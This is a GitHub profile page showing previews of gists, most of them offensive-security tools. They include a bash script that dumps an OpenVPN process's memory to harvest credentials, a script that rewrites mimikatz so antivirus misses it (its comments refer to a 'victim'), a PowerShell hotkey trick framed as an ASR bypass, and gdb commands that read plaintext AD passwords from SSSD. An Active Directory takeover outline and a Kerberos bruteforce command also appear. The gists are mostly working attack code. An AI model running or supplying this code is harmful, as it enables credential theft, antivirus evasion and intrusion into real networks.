Skip to content

Instantly share code, notes, and snippets.

View v4nyl's full-sized avatar

v4nyl

18 followers · 288 following
View GitHub Profile
@pakt
pakt / rdwr.py
Created August 15, 2015 10:59
Direct read/write access to Python's memory
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
@rvrsh3ll
rvrsh3ll / openvpnScraper.sh
Last active January 24, 2022 14:35
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
anonymous
anonymous / txt2pdf.sh
Created May 23, 2016 20:28
an easy way to turn formatted text files into PDFs.
#!/bin/bash
# a pandoc script to easily turn formatted text files into PDFs - May 2016.
# based on a script by @pdfkungfoo, minor changes by Ange Albertini
# requires pandoc http://pandoc.org/
# and either XeTeX http://xetex.sourceforge.net/ or LuaTeX http://www.luatex.org/
# Xelatex supports all system fonts by default, and UTF8.
# standard PDFLateX doesn't. LuaLaTex also does but is slower.
@imaibou
imaibou / mimikatz_obfuscator.sh
Last active June 24, 2025 11:18
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@bandrel
bandrel / check_hashes.py
Last active November 5, 2024 06:12
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#!/usr/bin/env python3
#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>
import argparse
import re
parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")
@monoxgas
monoxgas / shortcut.ps1
Last active May 29, 2020 14:49
Execute something under svchost.exe using shortcut hotkeys (ASR bypass?)
$Shell = New-Object -Com WScript.Shell
$S = $Shell.CreateShortcut("$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk")
$S.TargetPath = "calc.exe"
$S.Hotkey = "Ctrl+U"
$S.Save()
$Shell.SendKeys("^u")
Start-Sleep 10;rm "$($Env:AppData)\Microsoft\Windows\Start Menu\default.lnk"
@jthuraisamy
jthuraisamy / loaded_psp_drivers.cpp
Last active June 19, 2025 17:45
Loaded Security Product Drivers
#include <Windows.h>
#include <ImageHlp.h>
#include <strsafe.h>
#include "loaded_psp_drivers.h"
#include <set>
#include <string>
#include <algorithm>
#pragma comment(lib, "crypt32.lib")
@gladiatx0r
gladiatx0r / gist:c52d529ea268f7e74295c2c492cf9774
Created October 6, 2020 21:05 — forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
for who ever this interest, if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring
to dump the clear text password you can do :
```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From the /tmp/output locate the key_id for the user you want
Example of an output is :
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@gladiatx0r
gladiatx0r / kerberos_attacks_cheatsheet.md
Created September 18, 2021 02:04 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: